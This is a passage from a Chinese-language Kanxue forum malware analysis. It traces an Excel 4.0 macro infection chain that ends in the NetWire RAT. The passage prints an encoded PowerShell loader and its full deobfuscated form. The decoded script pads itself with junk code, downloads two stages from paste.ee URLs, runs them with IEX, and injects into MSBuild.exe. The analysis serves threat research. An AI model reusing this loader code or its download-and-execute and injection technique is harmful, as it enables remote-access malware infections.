VwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAJABWAFYAZgBPAEwAYQBHAGgAYwBOAGYARQBSAEUAdABpAEQAZgBvAFkATgBoAHgAaABDAFUAWgB0AE8AeABXAE0AQwBiAFAAUgBoAEkAZQBEAIAA9ACAAJwB5AFoAVgBNAE0AYQBiAHQAZwB3AFQAVABrAG4AWQB4AEwAcgBBAE4AVABlAHIAVABDAHAAbwBjAEIAdgAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAfQANAAoARgB1AG4AYwB0AGkAbwBuACAAbwB2AHEAcgBtAFMAawB5AHgAUgBQAE8AbQB1AFEAeQBRAGMAcgBzAGsAbwBRAEcATABQAGEASABUAEwAdgBxAFIAQQBWAEYATwBCAGwAewAgAHAAYQByAGEAbQAoACQAQgBYAGUAIAAsACAAJABYAEwAcQBIAHoAUgBWAFEAWgBzAGkAcgBjAHQAagB4AG0AbQBuAFAAVABpAEMASwBXAGwAegByAGwAdgAgACwAIAAkAHYARgBFAEEAbQBVAGsAQgB2AHgATwBTAGIAVAB5AEwAaQAgACwAIAAkAHkATwBPAGsATwBQAG8ASgBnAGsATgBTAGQAZgBkAFoAIAAsACAAJABsAFkAcwB4AGMAQwBrAHIAUwBGAFEAYgBxAFkAWgBRAFoAbgBnAEUASwBxAG8ATABkAG8AegBvAGMAVABpAG8AQgAgACwAIAAkAE0AbgBxAFYAVgBNAGQAcwB3AEsAWQBoAHAATQBMARABzAHcAVgBjAHYAagBnAFQAbwBEAHcAIAAsACAAJAB5AFcAYwBaAEsATABsAGEARQBSAFUAYgBTAHUAIAAsACAAJABuAHYAeQBtAEEAWgBRAHEAcgBnAEUAUgBEAEoAQgBoAEoAaABkAHkAbgB3AEkAZgBCAEIAIAAsACAAJAB6AGEAYwB1AEsAQQBGAHMAWQBxAFEAdwBwAGkAZwBrAHMARgB0AGkAUQBEAGsATAApAA0ACgAkAGYAeABzAFIAUgBXAEcATABkAGoAQQBhAHQAVABKAEEAZgBrAGcAWABzACAAPQAgACcAZQBsAFYAWQB4AG0AWQBMAGoAUAByAFQATQBuAHYAegBvAHAASgBQAGUAagBMAFYAeAAnADsADQAKACQAcQBWAFoAZQBWAE8AZgBDAFMARwB2AHMAWQBUAG0AUgBBAGsAagBaAEgAVgBFAGcAdgByAE4AZAB5AHYAWgBBAGIAegB2AEQAbQBFAHUAZABvAEoAIAA9ACAAJwBwAEQAdwBRAHAAYwBOAGoAYQBtAFgAcQBWAFEAdABqAGQAQQAnADsADQAKACQARQBYAGcAIAA9ACAAJwBSAFkAWABpAGUAdgBxAEcAbAB4AEEAUABjAHoAYQBZAEEAbABMAHkATgBFAEoAYQBuAHQAVgBRAGMAbQBGAHgASQBIAGYAcwBSAHUAaQBuACcAOwANAAoAJABmAG0AcwBVAEIAUQBrAEQAYwBCAFQATABoAGgATQBQAHgAdgBsAGEAYQBkAHkAcwBEAEcAVQBUAGkARwBGACAAPQAgACcAWQBPAGkAUgAnADsADQAKACQARgBsAGMAbABNAEEAawBsAGwAYgBhAFMAYwBVACAAPQAgACcAdwBNAEoAQwBEAUgB2AHYAUQBVAFYAdgBRAG0AUwB6AHYAegBzAEoASgBwAE4AZABPAEcAUgBlAHUAQgBHAG0ARwBHAE0ARgBmAGUAUABvAHEAZwAnADsADQAKACQAcwBlAG8AVgB5AEkAYQBYAGMAYgBxAG4AVwB3AFoAWgB0AHoAIAA9ACAAJwBCAE8ATwBqAHAASwBhAE4AVABRAGoARQBTAGMAVgAnADsADQAKACQAeQBaAGwAVABXAFQAZQBkAEsAUQBTAHAASgBHAEYAVwBvAFoAZgAgAD0AIAAnAGQAdgB6AEsAWQB1ACcAOwANAAoAJABHAHQAWABYAEwAQgBhACAAPQAgACcAegBIAGcAdQBoAGsAbABaAFoAcgBsAEUATgBLAE4AUAB0AHcAUABzAEQAWgBiACcAOwANAAoAJABiAE4AWABrAG0AcwBIAG4AaQBmAEYAUABIAGYAeQBVAHIAVwBhAFMAbQBwAHMAdwBnAEgAZQBPAG0AaQBYAGEAZwBsAFMAVABOAEIAbQAgAD0AIAAnAGsAeABXAGkARQB4AEgATgB5AHUAQQBoAHoASQBJAG0AVQBiAEQAZgBPAHQAQgBBAEgAZgBpAFcAJwA7AA0ACgAkAGUASABxAGsAdQBpAG8AVABLAHIAaQBBACAAPQAgACcAUQByAGgAcQBhAFgAZABnAHoAbQB4AEcAUgByAHcAJwA7AA0ACgAkAGEAWgBQAGwAQQBUAG4ASgB4AEYAWgBUAFMASgBqAFYAZgB5AGMAIAA9ACAAJwBTAFIARgBLAHQAZwBlAFYAcwAnADsADQAKACQAYwByAHIAeABrAFMAVABPAFAAdwBFAFkAcwBWAHkASgBOAHEAQwBjAGIAUwBPAG4ARAAgAD0AIAAnAFUARQBzAFUAbwBTAFIAVQAnADsADQAKACQAaQBiAFYAWQBSAEMAUQBqAGYARQB1AFkAagBNAGoAUwBvAFMAUQBCAEoAYwBEAHQAYwAgAD0AIAAnAE8AVwB1AEkAbQBHAFkAcwBQAGgAcwBSAGsAWgBMAGoAagBqAEoAagBrAHIASgBDAEEAegBBAFQAUwBGAFgAYgB3AFQAbgB1AHAAWABTAG4AQQByACcAOwANAAoAJABCAFoAWABpAHEAcABhAHQAVQBrAHMATgBYAE0AcwBJAG4ARwBGAFoASgBKAFIAVQBRAG0AUQB1AEwAUgBWAGoAdAB1AEgAYwBjAFEASgBkAHMAIAA9ACAAJwBEAHIARABHAFEAaAB3AFAAZQBoAHUAJwA7AA0ACgB9AA0ACgAkAG4AcgBJAEMAUgBFAFkAZwBoAEQATwBKAFUAYwBGAFAAIAA9ACAAJwBXAHcAYwBoAHgARwBhAFEASwBWAGoAeAB3AG0AbwBvAGIASABQAFUAYQB6AEYARQBMAGUAegAnADsADQAKAEYAdQBuAGMAdABpAG8AbgAgAGoASABmAE8AVgBtAEEAdQBBAFIAbQBrAHEASQBBAHgATQBHAEgAawBVAFYAYgBBAHsAIABwAGEAcgBhAG0AKAAkAHUAbABuAGIAaABrAEkAawBTAGoAcABsAGgAbABHAGkAcABqAGwAUgBaAFUAcwBWAHAAIAAsACAAJABFAFgAcgBYAFYAVABIAHgAVwBZAGkASABRAE0AZQBEAFcAcgBSAGUAbQBvAHMAVwBPAGMAcwBoAEMAWgB0AFMAbQBsAGYAbAB0AHUATwBXACAALAAgACQAawBQAGkAQQBoAFMAWQBuAFcAeQBBAEQATABJAFAAZQBVAEkAdABhAFoAdQB3AGYAUAAgACwAIAAkAGUAaAB0AEoAYwBkAHYAQgBDAFoASwBXAGcASgBUAHUAZwBiAHMAIAAsACAAJABhAGQAUABHAFoAbABWAHYARABwAFMAQwBsACAALAAgACQAbwByAHUATQBXAFcASQBLAEcAcQBVAHkAKQANAAoAJABGAFcARwBRAFcAWgBtAGIASgBsAG8AWQBiAHgAUABrAFIAbgAgAD0AIAAnAEgAYwBmAE4ASQBNAHQAagBNAE4ASABPAGYAZQB0AFAAUQB1AGUAZQBzAEEASQAnADsADQAKACQAWABMAFkAbABKAHIAQQBDAGgAQgBzAHIAWgBJAHgARQBkAHAAWgBOAEMAWABJAHUAaABoAHoAcAAgAD0AIAAnAEoAaABIAFQAeQBxAHcAbgBJAGEAVQBNAEUAZwBkAGwAQwBwAEkAdwBaAEIAQwBhAHUAZgB6AEQAZQBFAGIAcwBLAE8AJwA7AA0ACgAkAFQAbABZAGIAUgBCAFEAVQBQAEYAQgB4AHEAZQBJAGYAcwBxAHMATgBJACAAPQAgACcAaABZAFQAcgB0AEkARQB5AGIAQwBxAEoASwBBAGQATwByAHYASgBnAG4AVQB0AGgASgBZACcAOwANAAoAJABZAGoAQgBSAEEAUABvAEUAegBJAFoASQBIAFEAUQBkAHoARwBoACAAPQAgACcASQBCAGUAegB4AEUAYwByAE0AZQBsAGkAVQBtAGYAUABhAGsAJwA7AA0ACgB9AA0ACgAkAHIAZQBnACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG8AYAB3AG4AYABsAGAAbwBhAB0gLAAnAGcAJwApADsAWwB2AG8AaQBkAF0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAJwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAnACkAOwAkAGYAagA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AZQA0ADkAdQAwACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAQAAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIANwA4ACIAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBkAGwATwBNAHoAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAawAgAYQBjAGsAaQB0AHUAcABdADoAOgBlAHgAZQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA= | &('I'+'EX')

进一步解码得到,解混淆后的PowerShell脚本内容。


仔细阅读脚本内容后,发现前面是垃圾代码与增加延时,最后是通过调用CallByName下载下一阶段内容执行。

地址//paste.ee/r/e49u0,//paste.ee/r/dlOMz。


Function ZhZg{ param($xIxfmTFLHvQRN , $GPtEltKSlSBIDwArOphrhFygxx , $qfjydzoRxRgPADeXfddPJKQhakVwARMHovTnCTXIPf)$DiSCThogPCXterQgFZbEkrVLGUAeHqzAD = 'tSyJnGHnXzweeXOWUIycCLNHwyhKY';$CWpvyyivlUxxUVObqdPlWq = 'bfi';$rMoZw = 'yxapiZPoYWefF';$rsVIEumCLUOQPuqjwvAiVYomHDAxyTXwZrMy = 'gVBbwlGbSJVxoajeWVTDiBAupDrwRqXhsrQZy';$YmiLoue = 'Jt';$RCWtvJeVHmstJJbloFxJJgQwgVWMGQpuyH = 'oB';}$ximErUgtYCNIquMkflmZMZmROrwyvCInjA = 'OXEovQnx';If ('zxZuiObPBcbXwUpzYi' -eq 'VtaYqmxMbwrJZcRSRRBPgatlHYkSCOoXhobbYZjHkB') {$SK = 'CveCYiWSRvzoQRCfK';$HTbkAqtrhuff = 'bbpVpoApGBPWfbjIRFFqnLq';$SunIhAcnlVYNbwNrJXASMNVPJiQoaomPkxDu = 'sI';$YclKCW = 'UsNgQKXeEZYyyknMwiIcdtSrROvt';$cKMnBvwMIWFMTyVbtKVlPobutDbZWOB = 'dubOMKwpqAoLDP';$vwPYEaIUoi = 'txTXptVqiYWHOiNf';}$PzQqetgcHqxoVanfuRyVTKvqMglYpApquOEpSaP = 'nuiCX';DO{$ZbtSLTmpNgYbknzltwSwgGbBQHGdk = 'APUbBdKGSdURaa';$gJTVMTXjxBSzrCDMJFygIGIlW = 'ndobOgBYkxnHXvdgXZidSDP';$LMbtUZAhzlgtuVnm = 'TSGZBhDCcjiDsIjOXQCEIEKwFIlPjlBmvfzlIsJeYr';$qSeGdxeXFkipPHJTswnSrhwHNJxFeGYgQMTeb = 'ISF';$wBNpjezYQikY = 'JV';$sTzYtyMBZDnerqnVNdku = 'XZTGFqqvsLKIFJoSgUyoLQgqVhauOKWYbcUugSn';$Nyi= $Nyi + 1;} While ($Nyi -ne 6)While ($WGgrdVmg -ne 6) {$DgJmFiHtclYPvgholhcoulNhqSFkoNzutuLdNmVuNBD = 'OsaZyCsoJsFRTcvncXEPleWBVEbyL';$WGgrdVmg= $WGgrdVmg + 1;$atifTxrflmVLkAptKkriRqwowjWZD = 'atcbRLjnJxvxlSuatVLctrHdRkwtjjbSbrLbiJj';$WGgrdVmg= $WGgrdVmg + 1;$JWbtmTEetVqAObAjmzJgPpDZWd = 'tHSrkmhSWPNqxfRzOtb';$WGgrdVmg= $WGgrdVmg + 1;$zrbp = 'zCOUTBXJyLXbdFOhJdUYIMAyqpgvZV';$WGgrdVmg= $WGgrdVmg + 1;$fdI = 'jTyDNqgyUuYknMWqNHQanBQdeUbjcIs';$WGgrdVmg= $WGgrdVmg + 1;$VVfOLaGhcNfEREtiDfoYNhxhCUZtOxWMCbPRhIenA = 'yZVMMabtgwTTknYxLrANTerTCpocBv';$WGgrdVmg= $WGgrdVmg + 1;}Function ovqrmSkyxRPOmuQyQcrskoQGLPaHTLvqRAVFOBl{ param($BXe , $XLqHzRVQZsirctjxmmnPTiCKWlzrlv , $vFEAmUkBvxOSbTyLi , $yOOkOPoJgkNSdfdZ , $lYsxcCkrSFQbqYZQZngEKqoLdozocTioB , $MnqVVMdswKYhpMnCDswVcvjgToDw , $yWcZKLlaERUbSu , $nvymAZQqrgERDJBhJhdynwIfBB , $zacuKAFsYqQwpigksFtiQDkL)$fxsRRWGLdjAatTJAfkgXs = 'elVYxmYLjPrTMnvzopJPejLVx';$qVZeVOfCSGvsYTmRAkjZHVEgvrNdyvZAbzvDmEudoJ = 'pDwQpcNjamXqVQtjdA';$EXg = 'RYXievqGlxAPczaYAlLyNEJantVQcmFxIHfsRuin';$fmsUBQkDcBTLhhMPxvlaadysDGUTiGF = 'YOiR';$FlclMAkllbaScU = 'wMJCnARvvQUVvQmSzvzsJJpNdOGReuBGmGGMFfePoqg';$seoVyIaXcbqnWwZZtz = 'BOOjpKaNTQjEScV';$yZlTWTedKQSpJGFWoZf = 'dvzKYu';$GtXXLBa = 'zHguhklZZrlENKNPtwPsDZb';$bNXkmsHnifFPHfyUrWaSmpswgHeOmiXaglSTNBm = 'kxWiExHNyuAhzIImUbDfOtBAHfiW';$eHqkuioTKriA = 'QrhqaXdgzmxGRrw';$aZPlATnJxFZTSJjVfyc = 'SRFKtgeVs';$crrxkSTOPwEYsVyJNqCcbSOnD = 'UEsUoSRU';$ibVYRCQjfEuYjMjSoSQBJcDtc = 'OWuImGYsPhsRkZLjjjJjkrJCAzATSFXbwTnupXSnAr';$BZXiqpatUksNXMsInGFZJJRUQmQuLRVjtuHccQJds = 'DrDGQhwPehu';}$nrICREYghDOJUcFP = 'WwchxGaQKVjxwmoobHPUazFELez';Function jHfOVmAuARmkqIAxMGHkUVbA{ param($ulnbhkIkSjplhlGipjlRZUsVp , $EXrXVTHxWYiHQMeDWrRemosWOcshCZtSmlfltuOW , $kPiAhSYnWyADLIPeUItaZuwfP , $ehtJcdvBCZKWgJTugbs , $adPGZlVvDpSCl , $oruMWWIKGqUy)$FWGQWZmbJloYbxPkRn = 'HcfNIMtjMNHOfetPQueesAI';$XLYlJrAChBsrZIxEdpZNCXIuhhzp = 'JhHTyqwnIaUMEgdlCpIwZBCaufzDeEbsKO';$TlYbRBQUPFBxqeIfsqsNI = 'hYTrtIEybCqJKAdOrvJgnUthJY';$YjBRAPoEzIZIHQQdzGh = 'IBezxEcrMeliUmfPak';}$reg = ('{2}{0}{1}{3}'-f'dSt','rin', `D`o`wn`l`oa ,'g');[void] [System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object `N`e`T`.`W`e`B`C`l`i`e`N`T ),$reg,[Microsoft.VisualBasic.CallType]::Method,'htt'+[Char]80+'' + [Char]58 + '//paste.ee/r/e49u0').Replace("@@", "44").Replace("!", "78")|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object `N`e`T`.`W`e`B`C`l`i`e`N`T ),$reg,[Microsoft.VisualBasic.CallType]::Method,'htt'+[Char]80+'s' + [Char]58 + '//paste.ee/r/dlOMz').replace('$$','0x')|IEX;[k.Hackitup]::exe('MSBuild.exe',$f)

下载到第一个经解码后的文件,不过是已经经过处理得到的dll文件。


实际名称为Hackitup,如下可大致判断出后续会进行进程注入,结合上述的解码脚本内容,可发现注入的进程为MSBuild.exe。


下载到第二个文件,简单分析为NetWire RAT远控木马。





C2肯定已经失效了,但是也贴一下吧。





参考链接


  • https://www.virustotal.com/gui/file/67fd76d01ab06d4e9890b8a18625436fa92a6d0779a3fe111ca13fcd1fe68cb2/details

  • https://app.any.run/tasks/b37be5b0-1460-4dd1-992e-72ec74cec8fe/

  • https://app.any.run/tasks/25084eac-2823-4887-8f90-42623b01c2ae/

  • https://app.any.run/tasks/0ddc9dc1-0ff9-43c7-b456-35a296998809/

  • https://www.freebuf.com/articles/others-articles/236919.html

  • https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/

  • https://zeronohacker.com/analysis-excel-4-0-marco-from-field-office-sample.html

  • https://www.jianshu.com/p/d2bab95ec62c












- End -



看雪ID:jishuzhain

https://bbs.pediy.com/user-678001.htm

  *本文由看雪论坛 jishuzhain 原创,转载请注明来自看雪社区。


推荐文章++++

* 举杯邀Frida,对影成三题

* CVE-2020-0624 win32k漏洞分析笔记

* Galgame汉化中的逆向(三):自定义字库分析

* Galgame汉化中的逆向(二):系统字库与文字编码

* 初试IDA&FRIDA联合调试简单ollvm保护的加密函数源码


好书推荐








公众号ID:ikanxue
官方微博:看雪安全
商务合作:wsc@kanxue.com



“阅读原文”一起来充电吧!

    您可能也对以下帖子感兴趣

    文章有问题?点此查看未经处理的缓存